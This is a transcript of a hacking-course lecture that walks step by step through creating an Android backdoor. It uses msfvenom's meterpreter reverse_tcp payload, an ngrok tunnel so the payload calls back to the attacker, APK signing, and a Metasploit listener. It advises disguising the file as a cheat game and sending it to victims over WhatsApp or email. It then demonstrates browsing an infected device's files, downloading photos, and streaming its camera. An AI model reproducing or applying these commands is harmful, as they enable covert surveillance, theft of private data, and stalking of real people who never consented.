Hi! Within this section, we're going to discuss how we can create a backdoor so that we can get an access to the target device, that is a phone or a tablet, so that we can discover their files, discover their folders, get full access of the target device, like opening their webcam or camera and accessing their private information. And this is very achievable using Kali Linux, and we're going to see how we can do it with details. However, there is also another issue that we might want to consider before we start. Once we create a backdoor, once we create a malicious file that lets us access to the target computer or device or tablet or phone, it's also wise to think how we can deliver that file, deliver that malicious file to the target person that is using this phone or device. This is very easy to do in devices like computers, laptops, because you can just email them and someone can download the exe file and double click on that and it will work. But it's not the case for phones, right? So if you are using iOS, for example, then I believe you won't remember any time that you downloaded something from the internet and just double clicked on it and played it. Why? Because we use App Store to install applications on iOS devices like iPhone or iPad, right? So there is an official App Store and we download the applications from here. So suppose that we manage to create a backdoor, a Trojan or a malicious file for iOS. So how are we going to deliver this? So maybe you are curious about this stuff and you found out about a way to install these files to your iPhone. But most of the users, like 99% of the users, won't even know that, and even if they knew, they would get suspicious and they won't install your file. So we can upload it to the App Store, right? So they can download it from the App Store. Yeah, it's not possible actually, because Apple checks every App Store application before they release it. So when you develop an application for Apple, you upload it to the App Store and you wait for something like 2 to 3 business days, because they review your application and they look if you have anything malicious in that application. That's not very possible, but even if you manage to hide it from the developers of Apple, even if it gets released on the App Store, they will take it down after a couple of days. So maybe you have heard it, some kind of Trojans or backdoor circulating in the Apple ecosystem in the past. So how did it happen? So first of all, the restrictions of App Store got stricter and stricter each day, every day, once they discovered that there are some certain malwares and there are some certain data leakages to the apps. But there are still some ways, theoretically, to overcome this problem. For example, there is something called Apple Developer Account, and you need to have that in order to upload your apps to the App Store. And you need to pay $100 every year in order to have an Apple Developer Account. But there is also another thing called Apple Business Developer Account, which is $300 per year. And once you get that, actually you're allowed to publish your applications without uploading them to the App Store. So that this is for business to business applications. So regular people do not see your application, but the people you want to distribute this app to just can download this application and run on their iPhones or iPads. So theoretically, it's possible to open a business developer account and distribute your app through this way, so that people can actually install this in their phones, in their iPads and stuff. But this is costly and it will be noticed in a couple of days and it will be taken down. So I believe in the past year, a Russian hacker group managed to do this with exactly the business developer account, and they got noticed in a couple of days and they got taken down, but maybe they had reached their target, I don't know. So it's possible, but it's not applicable to the real world most of the time. So what I'm going to do instead of this, I'm going to focus on Android backdoors, because you can actually use Android backdoors in real life examples. Because even if we have Google Play like this, even if we have Google Play to download the applications as an official app store on Android devices, we also have other services, other ways of downloading applications and installing them on your Android phones as well. So even if we know about creating iOS backdoors, we won't even use them in real life. But if you know how to create backdoors for Android in a perfect way, then you will be able to practice it, of course, within legal boundaries in real life as well. So that is the reason why we're going to do this. So of course Google Play is a way of distributing your app as well, but it will get noticed and taken down eventually. So what we're going to focus on instead, creating our backdoors and distributing them via emails or WhatsApp or any other measures, because the users of Android can actually click on the APK, that is the final product of an Android development, and run it on their own iPhones, or not iPhones, Samsungs, or any other Android phones or tablets. All they had to do is actually allow the unknown sources to be installed their phones, and once they click on this APK file, the phone will ask them if they want to install this or not, or if they want to allow this or not. If they allow it, it will be installed. And luckily, most of the Android users actually allow this because they want to download the other files, other sources, just not depend on only the Google Play. So this is an advantage for us. So if you're going to test this on your own Android phone or Android tablet, make sure you open these unknown sources as well from the settings. And I'm going to show you how to do that during the lectures as well. Don't worry. Okay? And the reason that we're going to start with this is to practice the Kali Linux a little bit, learn about Android terms a little bit, so that we can move on to the real thing where we learn about programming and reverse engineering, the app manipulation, and everything. So if you have experience on this APK files or kind of creating backdoors for Android before, just be patient with me. We're going to see how we can use a tool called Msfvenom in order to create a backdoor for our Android devices. So the tool that we're going to use is called Msfvenom, or Msfvenom, however you may want to pronounce it. Let me show you how to spell it. In order to do that, of course, you have to open your Kali Linux and you have to open your terminal and make sure you're ready to write some commands on your terminal. I believe you know how to install Kali Linux, how to run it, how to run your terminal by right now. If you have skipped the previous section, make sure you go back and watch that before coming here. So over here, we're going to use Msfvenom, and in order to do that, first of all, I'm going to type Msfvenom like this and hit enter in order to see the documentation of the Msfvenom. Of course, we're going to write a lot of parameters, but at this point you don't know any. So first of all, I'm going to show you what are those. So we use this Msfvenom in order to create backdoors, in order to create some malicious files. And it all starts with payloads. So what are payloads? we use payloads, we use these tools in order to select what kind of operating system that we're going to hack in, and what kind of session do we expect back, and what kind of port and way that we should follow to hack in. So maybe you don't know these terms. Don't worry, I'm going to explain everything. As you can see, we can see the payload over here. It's actually -- payload or -p. We need to specify this payload, otherwise we won't get any backdoor created. And remember, Msfvenom is not only for creating backdoors for Android. We can create some backdoors like malicious files for Windows and other platforms as well. So we need to specify the platform, we need to specify the technology that we are going to use to hack into the target computer or target device. So I'm going to write it down first, and I'm going to explain it part by part to you. And we're not going to finish creating our backdoor in this lecture. We're just getting familiarized with Msfvenom so that we can comprehend all of this stuff. So all you have to do just right now is to write Msfvenom -p like this. So Msfvenom -p, and then we specify the payload that we are going to be using for this. So you first start with the operating system. Like if you're going to do this for Windows, then you write Windows over here. If you're going to do this for Android, then you write Android over here. Okay, so in our case, of course, we're going to go with Android, and then you put a slash, and then you write the session that you want to expect to get back. I'm going to explain this a little bit later on in this lecture, but right now just write Metasploit. So it's either pronounced as Metasploit or Metasploit. It depends on the country that you live in, I believe. So I'm going to call this Metasploit, and it's spelled as METR, like this, PRETER, Metasploit. And then put a slash, and then write reverse TCP, reverse_TCP. Don't worry, I'm going to explain. So Android is the operating system that we're going to be attacking, right? And you know it. And Metasploit is the session. So this a session manages the connection between the target computer or target device and the Kali Linux or attacker device. So in this case, we're going to attack an Android phone, and when Android phone connects back to us, then Metasploit will create a session. Actually, this payload will create a Metasploit session in which we manage this session, in which we manage this connection, so that we can send some commands to the Android to be executed, like browsing the files or opening the camera of the phone or something like that. We do this with a session called Metasploit. It's very advanced. It has a lot of commands built in so that you can interact with the hacked device. And then later on, we have this reverse TCP. This is the way that we are trying to hack into. Like we could have written over here something like reverse TCP, reverse HTTP. So the reverse means that connection will come from Android phone to us. It won't be coming from Kali Linux to the Android phone, because it will be much more detectable if we try to send the connection from here to this phone. But if we send the connection from Android phone to our Kali Linux, it will be much less detectable. Okay, and it is actually it's the case for the Windows and other operating systems as well. We don't use bind, we use reverse connections when we try to create backdoors. So TCP is the port, is the gate that we are trying to go in. We could have used HTTP or HTTPS as well. In my trial and errors, I found out that reverse TCP is the way to go, so that I'm going with reverse TCP. If it doesn't work for you, you can just try to create something with reverse HTTP or HTTPS as well. So once we do that, we're going to specify a little bit more parameters within the couple of following lectures, and it will create a backdoor, a payload for us. Once we send this file to the target computer or target device, the Android actually in this case, once the user taps on this file, it will create a session between Kali Linux and Android phone, so that we can easily access all the files and folders and command system inside of those phones or those targets. We're going to discuss the IP address of that we're going to be using to create this backdoor, and some other very interesting concepts regarding to this IP issue over here. So we need two more parameters in order to create this backdoor, which is lhost and lport. They stand for local host and local port respectively. So it means that the host, the IP address that we're going to be expecting this session to come, and lport means the port number that we are expecting this session to come as well. So this will be something like 192.168.1.1, and port will be something like 8080 or 4040 or something like that. So what is the issue? Why don't we just give the IP address and wait for connection to come over here? So there are actually more than one IP address that we can give over here. So if you have ever watched a section like this or a tutorial like this in YouTube or any other websites, most probably you would see something like local IP address is put over here. Actually, there are more than one IP address. If you go to google.com and search for what is my IP address, then you're going to get your public IP address, which is the IP address of your router, your modem. Okay, this is not the specific IP address of your current device. This is the IP address of your router. So if you go over here and say what is my IP over Google, it will give you some kind of this public IP address. I'm blurring mine so that you won't see mine, but you can just click whatever website that you want to use over here, like whatismyipaddress.com, and you will find out your own IP address. And this is your public IP address. Okay, this is the router's IP address. I'm going to explain what public means, what local means in a minute. But the problem over here is that if you give that public IP address to this backdoor, then it's not safe for you. It's not safe for the hacker, because in real life, if a hacker commits a crime, they can actually analyze the backdoor and they can see the public IP address on that backdoor, so that they can try to locate the location of the hacker with that information. So hackers use other platforms, other tools in order to overcome this problem in real life. In order to be realistic, we're going to use those tools in our example as well. So I'm going to explain what a local IP is and what a public IP is with a detailed presentation to you, so it won't be some kind of vague thing in your head. So when we try to visualize how internet or how networks work, we can use this chart. So there is a router in your home, and you have some kind of devices like phones and MacBooks or iMacs or computers or laptops, and they are all connected to that router because they want to go to the internet. So when they try to go to google.com, for example, they send some requests to the router, and router sends some requests to the internet. They get some responses back, and router forwards that responses to the related device. Okay, so this is how requests and responses work. But over here, we only have one public IP address, which is 85.100.25.149 in this case. But also we have some local IP addresses as well. So these local IP addresses are assigned by router with some kind of tools to the individual devices in your home or in your network. Okay, so what you see as 192.168.010.011.012 represents the local IP address of the individual devices. So router generally gets the first IP address unless it is configured otherwise, so it is 192.168.0.1. So they use this IP addresses and something other else called MAC addresses in order to circulate this information within network, in order to have this kind of communication within network. Okay, but we use public IP addresses in order to communicate with the external world. So if you guess that every individual device in this house has the same public IP address, then you're absolutely right. They have different local IP addresses, but they have only one public IP address. So if you want to get a connection from some outer world, you have to give them your public IP address, which is not safe because it's detectable, it's trackable, okay? And also you have to do some kind of port forwarding. In this case, even if you are willing to share your information with a backdoor, then the router has to know which device it should forward their information to in order to forward the related information. For example, you hacked into the Android gave you the connection back, you got it from the router, but router should know whether it should forward this connection to iPhone or iMac or MacBook or Kali Linux or any other device in the house. And this operation is called port forwarding. It's pretty easy to do that, but it causes some problems with some kind of internet providers. So in order to eliminate this port forwarding and in order to eliminate the safety issue that is brought us by sharing our public IP address, we're going to focus on something called tunneling. Okay, we're going to use some services and we're going to make that service port forward or forward those information to our computer, to our Kali Linux directly, so that we won't be sharing our public IP with the backdoor, with the malicious file that we are trying to create. And also we're not going to deal with the port forwarding in a router level in our own house or in our own network. So that's actually how hackers in the real world work as well. So let me show you some kind of examples regarding this local IP as well, so that you will comprehend it in a better way. So what you can do, you can open your terminal inside of Kali Linux. I'm going to open a new tab and write ifconfig, ifconfig. And what you see over here is 10.02.15 or something like that, and it's our local IP address. So I'm not going to write 10.02.15 over here. I'm going to write some other thing that I'm going to show you in a minute. But maybe you may think that what is 10.02.15? You said that 192.168, something like that. So 10.02 generally refers to NAT network IP addresses. So we're using some kind of virtual network inside of our VirtualBox. Remember, we are using NAT network, so we have this 10.02.15. If we use some kind of USB Wi-Fi card to connect our Kali Linux directly to our router, then we would get something like 192.168. Okay, and it doesn't even matter what kind of IP address that we have, if we have a working local network. So maybe you can see something like 172.168 as well, rather than 192. That, just don't be surprised, it's possible. And over here, as I said before, we're not going to use those information in order to create our lhost and lport, but rather we're going to use something called tunneling. But it's essential for you to understand this information so that you would understand what are we trying to do with the tunneling service in a minute. Okay, we're going to discuss tunneling services in order to overcome the problems that we have seen in the previous lecture. So in order to do that, we're going to use something called ngrok.com. Okay, so this is a tunneling service. But what is a tunneling service and why do we want to use one? Of course, we're going to use it for our backdoor, but there are other various uses in order to leverage this kind of tunneling services in real life. For example, in our Kali Linux, we have actually a web server. Okay, you can actually host a web service in your Kali Linux. So let me clear this tab right now. We're going to write it later on anyway. So I'm going to write service Apache 2 start. So when you do that, it will run a web service in your Kali Linux. So actually there is a web server going on in your Kali Linux right now, and you can change the content of it in order to host a web server or I don't know, website in your Kali Linux. For example, if you go to your file system, okay, to your folders, I will show you where your website is right now so that you can edit it and use it if you need it. We're not going to need it anyway, but I'm going to show it to you so that you know how to use it. So if you open your file system, I'm going to wander into file system and a directory called var. Okay, so if you go over to this var, you will see a folder called www, which is your website, and you're gonna have to double click on this HTML and you will see this index.html. So index.html is the file that you see when you browse into a website. So whatever is written over here will be displayed if someone browses to your website. Right now I'm running this web server, but since my Kali Linux is on the NAT network, only the files or only the computers on the NAT network can actually see those files, see the website that we are running. But we can use ngrok to open this website to the world as well. So if you open your browser, okay, in your Kali Linux, like your Firefox, and if you run fconfig to see your IP address, you will see mine is 10.02.15. I'm going to write 10.02.15 in my browser, and you will write your own IP address. And what I will see is the content of my index.html. As you can see, this is a default page that is created as a test or as a default website, and I'm now seeing it. If I had another machine on my VirtualBox, I could have written 10.02.15 to any browser from that machine, and I can reach this website as well. And if I use ngrok, I will be able to open this website to the public. That's not what we are looking for, but tunneling service lets us connect our local IP addresses or local machines to the internet using their own services so that we can actually gather the information to the ngrok IPs from the backdoor from the Android phone and forward that information to the Kali Linux using the same system. Okay? We're going to use it for this reason, but remember the tunneling services may provide much more broader or greater advantages in given time. So what we want to do is to set the ngrok up in our computer so that we can reach their services, so that we can actually forward that information when it comes to the ngrok to the Kali Linux, so that we can create our session, so that we can hack into the Android phone and get access to their privileges, browse their files and folders and everything. So that's what we're gonna do. So first of all, I want to go to ngrok again and download some files and folders and set up some account information with ngrok, because we will need those information. You won't be able to use the ngrok without creating any account. Okay, so what I would suggest is to close this down because we are done with it, and minimize this tab and open the Firefox. And then next thing we're gonna do, we're going to write ng, like this, ngrok.com over here. And once we do that, we're going to register for an account. So you see login and sign up buttons over here. Of course, this theme or some kind of user interface may change in over time, but they will always provide some kind of login or sign up register options. So you want to register for an account. Don't worry, it's free by the way, but you're going to have to provide some kind of email and other stuff in order to create an account. So I already have an account, so I can go to log in, but I'm going to show you how to sign up as well. So let me click on sign up. And as you can see, you will only provide your name, your email, and email again, and a password, and it will create your account for you. So it's fairly easy. So rather, I'm going to log in with the previously created account of mine, and it will direct me to the same page that you're going to see when you sign up. So I made up an email for this, like jackkirox@gmail.com, and password is something like this. Let me save this. Yeah, let me update this. And it will ask me to complete an installation or setup process. So this is what we are looking for. As you can see, ngrok can be used in Mac OS, in Windows, and in Linux as well. Since we are in Linux, we are seeing the button for Linux, but if you want to use this in Windows or in Mac for some reason, of course you're allowed to use it. But I'm going to download for Linux, so I'm going to click on this button and I'm going to say save file. Okay, it will download the file for me. And then, of course, I'm going to have to unzip it because it will be kind of zipped. You can use unzip command in order to unzip it, or you can just right click on it and unzip it yourself. So let me open the downloads file and show you what I mean. So open your downloads file from your file system. Okay, it should be under root. So root, downloads. Once you double click on the downloads, you will see the ngrok downloaded file over here. So this is a zip file, and Kali Linux also have its own archiver. So if you double click on that, you can see the ngrok. You can just drag and drop it to your own folder like this. Okay, so it will be unzipped. Of course, you can use the unzip command as well in order to get familiarized with Kali Linux a little bit more. So after that, let me come over here. you're gonna have to connect your account. So since you have created this account, it will give you this kind of an authentication token. So yours will be different from mine, so you're gonna have to copy it from your own account. I'm going to close down my account, so don't try to write my own token over here. Create your own accounts and just copy this command from here. So I'm going to copy everything and I'm going to paste it on my terminal so that it will be authenticated, so that it will be ready to use. And don't skip anything, just make sure you get the whole line over here, okay? Because otherwise it won't be authenticated and it won't work. So once you are ready, you have to open your terminal one more time and change your directory into the downloads folder or any other folder that you have downloaded your tool into. So mine is in downloads, so I'm going to say cd downloads, and now I'm inside of downloads. If I just paste this selection or clipboard over here, it will run the ngrok and it will authenticate me using the token. Okay, now my token is saved. I'm free to use ngrok services. So that's how you install and that's how you set up your environment for tunneling services. Next, we are going to be finally ready to create our backdoor for Android devices using this tunneling services. So if you go to documentation of this ngrok.com, you will see a lot of usages and a lot of commands that you can use, you can leverage in your own environment. As you can see, in order to create some kind of connection, all you have to do is just specify the connection type and the connection port that you want to use. I'm going to show you what you can do or what you have to do in order to make this work. Don't worry, but if you want to use ngrok for some other special occasions later on, make sure you read this documentation because it's very useful actually. For example, in here, they are trying to expose a web server on port 80 of your local machine to the internet, and that is what we have seen in the previous lecture when we tried to start the web service of Apache. But that's not what we're going to do right now. We're going to use this for sending the connection from the Android to the ngrok. So in order to do that, of course, we're going to use the same thing. I'm in my downloads folder one more time in my terminal, and I'm writing /ngrok tcp and a port number. So maybe you can think something like that. Yeah, you're talking about ports a lot of times during this training, but you didn't explain what a port is, and you're correct. So we're sending some requests and getting responses when we deal with internet operations in our daily life. So every connection, like going to google.com or receiving that connection from Android phone, requires some sort of a gate, some sort of a port to be processed on. So every connection uses its own specified gate, like 80 for HTTP requests, or I don't know, 22 for SSH requests. And for mail requests, we have a lot of different ports. For some kind of other special services or special connections, we have other ports. So we have some respective gates, respective ports for different kind of connections. And firewalls actually try to observe these gates, observe these ports, so that they won't be left open for any kind of incoming malicious connection Okay, so we're going to use a port that no one else is using, something like 4242 or any other thing like 5555. And if it doesn't work for you for some reason, you may choose to use another port. For example, I'm going to write 4242 over here, and since we do not have any kind of firewall in our Kali Linux, it should work fine. So I'm going to hit enter, and as you can see, it started to work. And we're not going to come across with kind of firewalls in Android as well. So most of the time this 4242 will work out for you, but if it doesn't, just try 5555 or 6666. Okay, so as you can see, it's now started, and it's some kind of doing a forwarding operation, which is what we are looking for. As you can see, we are forwarding this tcp.ngrok.io with this port to our local host. So this address and this port would be different for you, maybe different for you. I have 17.197 over here, and in the local host, of course, we have our specified port over here, like 4242. But this will change for you. But we're going to use this. So I'm going to use this as a local host and a local port in my Msfvenom. Because why? Because remember, we want to direct the connection from the Android phone to the ngrok, and then later on from the ngrok to our own local host, to our own Kali Linux machine using this service. So that is exactly what we are doing right now. So what I'm going to do, I'm going to give this as an input to lhost and give the port as an input to the L port in my Msfvenom. So you have to do exactly the same in order to succeed. So this would be different for you. Even the address would be different for you. So make sure you copy your own, not mine. So over here, I'm going to use this, and I'm going to use 17.197 as a port. And this will receive the information and forward it to me once it comes. So don't close this down, just open a new tab from the file and say new tab, okay? Because if you close it down, the service will stop. So open a new tab and write the Msfvenom code command that we have written before. So as a payload parameter, I'm going to specify Android, meterpreter, and then reverse TCP, okay? The reverse underscore TCP, and then later on we have to specify the lhost and say equal to, and this will be equal to the 0.tcp.ngrok.io, I believe, and the L port will be 17,197. So I'm just going to copy and paste those. 0.tcp.ngrok.io. So it's easy, I can write that without forgetting. I suppose 0.tcp.ngrok.io. And then L port will be, so 17, let me see it, yeah, 17.197, so 17.197. Here we go. Now we are okay. And then we specify where to put this payload, where to put this APK file that we have been trying to create. In order to do that, you can just write the results like -r and specify the folder that you want to put it so that you can access it easily and you can forward it. So I'm going to say R, okay, with a capital R, and say this greater sign. It means that just write the result into this folder, into this location, okay? So R greater than /root/ downloads or documents or any other folder that you may want to put this. So I'm going to say ngrok.test.apk and I'm going to put it inside of my root folder directly. Of course, you're more than welcome to use another name for your APK, but don't forget to specify .apk extension at the end of this. I'm just going to call this test because we're testing it, okay? In real life example, it would be something like game.apk or I don't know, super cool application.apk because you're going to send it to victim next. So here you go. I believe it's now created for us. Let me minimize this and let me go to root folder. And here we go. We see the ngrok test.apk. So this is the exact file that we are going to send to the victim, and once the victim installs this, we're going to... Now that we have created our malicious APK file, next thing to do is actually we're going to send it to the victim, but once they click on it, once they run this file, we will get the connection. So before we do that, we need to be prepared, we need to be ready for this connection. And the way to do that is to listen for incoming connections on our Kali Linux. So whenever you want to hack into some computer or some device, you should listen for connections. So that's how you get a session out of this hacking. Okay, luckily we have a tool embedded in Kali Linux for that. As you can see, my ngrok is still working on one of the tabs, and I'm not going to close this down because it will kill the service. Okay, I'm going to leave this as it is, and this will forward me to the connection. Once the victim clicks on the APK file on their Android device, it will forward the connection to the ngrok and then ngrok to me. And I should be prepared for this, so I'm going to run this command: service PostgreSQL or SQL, however you may want to pronounce it, and start. So this will start a database service called PostgreSQL, and the reason why I'm starting this is because I'm going to use something called Metasploit. Okay, Metasploit uses this as its database. And Metasploit is a tool commonly used in penetration testings. So you can write MSF console and hit enter in order to start Metasploit. So with Metasploit, we can actually listen for incoming connections. We can find a lot of exploits that can work on some of the vulnerabilities that are commonly found in servers or computers. We are not interested in servers or computers in this course, but we are interested in telephones and tablets or mobile devices. But we can use the listening feature of the Metasploit as well in order to receive this session. So after you run MSF console, you will see a screen like this where you will see the MSF console. Okay, that's how you write commands inside of Metasploit. Once you see that, you can just begin typing MSF or Metasploit commands. It's fairly easy to use actually. As you can see, we have a lot of payloads, a lot of exploits embedded in Metasploit as well. But we are particularly interested in a module called multi-handler. So this module exactly does what it sounds like. It's a multi-handler, multi-purpose handler. We can use it to listen for incoming connections. And in order to do that, I'm going to write this: use exploit / multi / handler. Okay, this is how you specify the modules inside of MSF, inside of Metasploit. So we are interested in this multi-handler module. So once you hit enter, it will enter into this module, and then you can see the options and features of the specific module. So first thing to do is to set the payload to the exact payload that you have written before. Because as I have said before, you can create many backdoors for Windows or Linux or Android and other operating systems as well. Since we have used Android, I'm going to do the same thing over here as well. So I'm going to say set payload, and then I'm going to write the exact notation, exact same syntax that we have written down before, which is Android / meterpreter / reverse underscore TCP, and this is reverse underscore TCP. Once I write that, I will hit enter, and as you can see, it has already assigned payload to be this way. So when I say show options, it will show me the options of that specific payload and specific handler. So we have to specify the L host and L port. But this time it's going to be a little bit different than before, because as you can see, we have specified this to the backdoor, because this is where we will receive the backdoor's incoming connection, but also in Kali Linux we will receive the connection in the local host and in this port. So this time I'm going to go for local host, which is 0000, and for the port I'm going to use 4242. So don't get confused over here. We have used the left hand side in the backdoor, and we are using the right hand side in the listener part. So in order to set a value over here, you have to say set the value name and the value itself, like set lhost and set lport 4242, like this. Okay? Once you do that, you can say show options, and you will see the input that you have given is already over here. So now we are ready to be listening for incoming connections. So since this is a payload or exploit kind of tool, we have to say exploit in order to start for listening, and I will add this -J and -Z in order to listen to this in the background. So this will be running in the background, but this will not lock our terminal, so we will get notified once we have the connection back from ngrok, and we can just interact with the session. Okay, so right now all I have to do is just transfer this ngrok test.apk to the victim machine. So there are a lot of ways to do that. Actually, you can just send it through the WhatsApp, you can just send it through with email, you can just find a lot of different ways to transmit this. Maybe you can just upload this to a server or upload this to any kind of file transfer website and ask victim to open this. So it goes like this. You just email someone, hackers actually, malicious hackers, bad hackers, email people and say that, yeah, we have this kind of tweaked game, you can do cheatings with this APK if you want, and they download it and they click it, and then they get hacked, obviously. And the way to do that is actually find a file transfer service which is commonly available on the internet, but I'm going to go for files.fm, which is essentially something like vtransfer.com, but APK files can be blocked in some of the services, but I found out that files.fm actually allows transferring .apk files, so maybe you can try that. But if you cannot make it work, you can always try other services as well, or you can try to email or send it through any other communication channels. So as you can see, I have uploaded my file and it has given me a link. So the next thing to do is actually sending this link to the victim, but as a demonstration purpose, I'm going to go for my local machine, which is my host machine, my Mac, and I'm going to try and see if I can download this file to my Mac. Okay, I suggest you do the same because we are not done here. Actually, we're going to need one more step before we send this link, exact link, to the victim. We have to sign this APK as well before we send it. I'm going to explain what this is, don't worry. And here you go. I believe we have managed to download it. And here you go, our APK file. So one last thing to go before we make this happen, and that is signing. Now we have created our APK. There is one last thing that we should do before we send them to our victims. So we need to sign this, and by signing I mean having a signature identifying us as a developer. So without doing this, some of the devices, actually most of the devices, won't accept this APK and won't run it. You may be able to install it on your own machine, but you won't be able to run it. So in order to avoid this problem, we're going to sign it. So you have transferred this APK to your host machine, which is maybe Windows, which is maybe Linux, or which is maybe Mac. So I'm going to show you a way to sign this. And if it doesn't work, I'm going to show you some alternatives so that you can actually do this process. So if you're on Windows, click on the Windows sign and write CMD in order to open command prompt. And if you're on Mac, just open your terminal. And if you're on Linux, of course, open your terminal as well. So we need to run some commands, and I'm going to show you what are those commands. And remember, sometimes it doesn't work. I'm going to show you some alternative ways to fix this problem or some other tools to overcome the signing issue. So this is a long command actually, so I have it on my notes. I'm going to copy and paste from my notes, and of course I'm going to include those codes in the resources of this lecture as well. So this is the code that we are going to run. This is the command. So it uses a tool called keytool, and it generates a key store file, which is a file identifying the ID of the developer. So it will ask for some information like your name, your country, and some other stuff, and it will ask a password, as you can see. So give some password and give this password one more time, and when you see this first name, last name, and stuff, you can just skip it by hitting enter. And for the last time, you will see something like no, and just write yes and hit enter. So if it doesn't work for you, don't worry, I'm going to show you an alternative, remember? So this created a key store file, but since I'm not in the desktop, I should have written cd desktop and then run this command. I am in my users until Sam, so I believe it created file over here like this. So I'm going to move this file to my desktop. So it's essential that you have these two files side by side. It doesn't matter if you're on desktop or on your downloads or your own documents, just cd into that folder from your terminal, okay? So I'm going to cd into the desktop, and then later on I'm going to run the second command. So copy and paste the second command from the resources of this course, okay, from this lecture, and we are going to use this key store to sign this APK, and this jar signer tool does exactly the same. All you have to change is the name of this file. So if this is ngrok-test.apk for you, you don't even need to change that. It will ask you for your password. Just give the same password and hit enter, and now this is signed. So if it didn't work out for you, what you can do? So the reason why it might have failed for you, you need some JDK tool in order to run this jar signer, okay? JDK stands for Java Development Kit. So let me show you. Let me go to google.com. You don't have to do that right now. So let me search for JDK, and here it is. So this is Java Development Kit, and in fact 2 lectures later on we're going to install this to our machines, and we're going to install some IDE called Android Studio, and we're going to run some Java codes as well. But right now we don't have this. So an alternative tool is to find an Apk Signer on Google Play like this. As you can see, if you search for Apk Signer, you get a lot of results. So do that within your own Android device, okay? So search for Apk Signer and just download the first one that comes up. That way, if you download your APK from Files.fm to your own phone or own tablet, Android tablet, okay, and then if you use this APK with Apk Signer app that you have downloaded, then you will be able to do exactly the same thing that we have done with the comments, okay? This tool does exactly the same thing. So if you download this and if you download the APK, you can just sign it inside your machine as well. Then you can upload it to some kind of server or Files.fm one more time and then send it to the victim. And if you don't have any Android device at all, you can use something called emulator, a simulator, okay? An Android software that simulates the actual Android phones. And you're going to see how to use it in the next section as well. In this section, we're just warming up. We're getting you familiarized with concepts of Kali Linux, of backdoor, and of hacking as well. So we don't have Android Studio, we don't have JDK right now, so you may encounter some kind of difficulty like jar signer thing, but you can overcome this with Apk Signer, obviously. After you do that, of course, you can just go to files.fm one more time or any other service and upload your signed APK. So if this doesn't work out for you, just go to the next section, download the JDK, and then try one more time, okay? So if it did work out for you, I suggest you don't delete this key store, or if you have downloaded Apk Signer, don't delete that application, because we're going to use this a lot during this training. But I promise you it will work out eventually after you download JDK and SDKs of Android Studio, so don't worry about that. Now we are ready actually. I have sent those links to the victim, and I have my ngrok working on my Kali Linux. I am listening for incoming connections with Metasploit tool, and I believe we are ready to test this. So all you have to do is just send the link to your Android device, and again, if you don't have any Android device to test this on, wait for the next section where you will learn how to use Android emulator. So here you go. In my own Android tablet, I'm downloading this APK, as you can see, and once it's ready, it will be ready on the downloads folder like this. So if I click on the ngrok test.apk, it will ask me for some kind of permissions, and I'm going to say install. Okay, so this will install the application on my tablet, and if I say open, then it will open the application, and at the Kali Linux, as you can see, the Meterpreter session 1 opened for me. Now I don't see anything on my tablet right now, so if I was a victim, I would have thought, yeah, this app doesn't work. But in fact, we managed to hack into that Android device. As you can see, we have the session over here in Kali Linux. So if you hit enter, now the session is opened. In order to reach those sessions, you should run sessions.l. So this will list the sessions. As you can see, we have only one, and it's an Android device, and you can see the connection is coming to my local host. So if you say sessions-1, so this is the ID of the session, it will go into the Meterpreter session. As you know by now, Meterpreter is the session handler for us. So if I run sysinfo, it will display the information of the victim system like this. So this is an Android device. It runs on 4.4.4 version. And if you run help, it will display the available commands for you to run. And in fact, you have a lot of commands, a lot of options on Meterpreter sessions. So this is the beauty of the Meterpreter. You get to see what are the options, and you get to just run them and see the result back in an instant. Okay, so you can actually browse through this help documentation of the Meterpreter so that you can understand what's going on, and you can read the descriptions like this. So I'm going to show you some of the most popular ones, and you will see there is a section dedicated to Android commands over here. Like you can dump the call logs, you can dump the SMS messages, you can try to send an SMS actually, you can just set the audio mode, you can just set the wake lock or something, and you can actually run ls and browse through the file system of the Android device as well. For example, let me go to cd ... and cd ... one more time, and I believe we are inside of data folder right now. If you're in some place else, you can browse through the data as well, right? And let me run pwd. Yep, I'm inside of data. So let me go to some other command, some other folder over here. Let me go to root folder and run ls to see my options first. Yep, here you go. We have a lot of files and folders over here. I can try to find some sensitive folders and files by just browsing through this file and folder system of the Android device over here. I can download anything I want. I can try to upload new files to the system using this Meterpreter session. And the commands are very basic. You just gonna have to read the description, but it's upload and it's download followed by the file name. Okay, so once you get the session, it's very easy to move on from here. For example, let me go into SD card, CD SD card, okay, and if I run ls, I will see the contents of the SD card. Like you can actually reach the music downloads, movies. Like you can go to downloads, for example, or pictures, and try to see the pictures of the user. So let me run ls to see if I have any. Yeah, I have something called IK screenshots, I believe. Yeah, let me try to download this and you will see what I mean. So download IK screenshots, and it will download this file for me and save it to my root folder. Okay, and you can try to display this with inside your file folder system inside of Kali Linux, obviously. Then let me go back a little bit and let me go into some other folder like downloads. Okay, I believe it's named download. Yep, so download, and let me run ls. Here you go, we see our own file ngorp-test.apk. so these are the files that our user has been downloading all the way through, right? So as you can see, we managed to hack in and we're browsing through the file and folder system. This is very cool. So there are actually other commands like sending SMS or getting the calls, but I don't have any a kind of SIM card inside of my tablet. It's not even a phone, it's a tablet like an iPad. Okay, so I'm not going to be demonstrating those examples, but if you're doing this for a phone, of course you're more than welcome to test this on your own time, just sending SMS or sending trying to get the call logs or something. But as you can see, we have something called webcam stream, and this is one of the most popular commands. Like you can use this webcam stream to open actual webcams on computers, but in the devices, mobile devices, it actually opens the camera of the related device. Like if you're on a phone, you can actually see what's going on around the user, around the victim, by using this command. So let me display this. Obviously I have a camera on my tablet, so let me run webcam stream with only 1M. Okay, let me delete this and hit enter. So this will start a service for me, and it will give me some kind of a web link or something, some HTML file for me, and I will have to open it. So don't close this and don't hit on any other word or any other key from your keyboard. So this should be running on its own, okay? And copy the selection. So as you can see, this is running some kind of HTML file on my root folder. And if you go to your root folder with your file manager, you will see that HTML file. But rather than seeing it, if you open any Firefox tab, you can just paste it, okay? And you can just open that HTML file on your own machine. And now I see my tablet phone or tablet camera or my phone's camera. As you can see, this is my garden. I'm just holding up the tablet so that you can see what's going on. And let me try to go into the image as well, but I believe, yeah, it is kind of shady, so you cannot see me clearly. But obviously we managed to hack into, and obviously we managed to get the phone or tablet camera stream as well. So after you are done with it, you can hit Ctrl+C to stop this from streaming, okay? So it will go back into your session, and you can continue whatever you want to do with the Meterpreter session over here. And remember, it displays, it actually puts the files on your root, so you can reach those files that you have downloaded or that you have streamed from your root folder later on. So this is kind of cool, right? We managed to hack into the device, we managed to browse all the information, we managed to download whatever we want, and we managed to actually open the camera of the phone as well. So you can try to go into the data of the related apps like WhatsApp and other apps as well, try to find the logs and try to see if you have anything useful over there. And it's very easy to hack into the devices using Msfvenom if you can come up with a good strategy. So beware 